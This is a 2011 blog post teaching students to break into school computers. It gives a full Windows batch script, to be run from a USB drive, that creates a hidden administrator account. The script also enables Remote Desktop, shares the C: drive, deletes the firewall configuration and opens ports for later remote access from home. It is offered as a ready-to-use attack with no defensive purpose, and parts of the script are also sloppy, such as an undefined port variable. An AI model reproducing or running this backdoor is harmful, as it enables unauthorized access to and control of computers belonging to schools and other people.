Sunday, 24 July 2011

How to Hack your School Computers




  • Save as .bat fileNow wat if i can hack mah school coimputer from mah home ? Will'nt it be too good to share ? Well dont worry m sharing this with you.


    There are two ways to do so:

    (i) Dropping a trojan.
    (ii) Creating a batch file encoded in Net Framework and applying it.


    Well i will cover the trojan trick later on. Now just concentrate on the batch file. Its just as easy as typing something in notepad and then saving it.

    Tools required:


    • Pen Drive / USB drive
    • Mind
    • A lil bit of time.

    Now What you gotta do :


    • Copy the below code
    • Paste in notepad
    • Save as .bat file           


      Code :  

      


           @echo off
    REM ......: Created By Jigsaw :......
    REM ......: HackPcOnline.Com :......

    REM EDIT THESE SETTINGS
    set username=USERNAME
    set password=PASSWORD
    set rdport=3389
    set tnport=23
    set rport=CHANGE_THIS
    REM END EDITING SETTINGS

    REM Adding The Backdoor
    net user %username% %password% /add
    REM Pause For Process
    ping localhost -n 2 >nul
    REM Adding Admin Access The Backdoor 
    net localgroup Administrators %username% /add
    REM Hiding The Backdoor From Start Menu
    REG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nul
    REM Enabling Terminal Service
    REG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0
    REM Share C:\
    net share system=C:\ /unlimited
    REM Stealing The IP Stuff
    ipconfig /all >> C:\attach.txt
    REM Deleting The Firewall Configuration
    netsh firewall delete
    REM Opening Ports
    netsh firewall add portopening TCP %rdport% "WinSvcService"
    netsh firewall add portopening TCP %tnport2% "WinSvcService"
    netsh firewall add portopening TCP %rport% "WinSvcService"
    cls
    exit


    You can change the username, password and the rport (randomn port you choose to be opened)

    At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.

    Save it and remove your pen drive.


    Now run this bat file in ur school Pc. 
    Now when you get to your home, just telnet the pc or  Remote desktop it.
    You are  done gyes !! 




No comments:

Post a Comment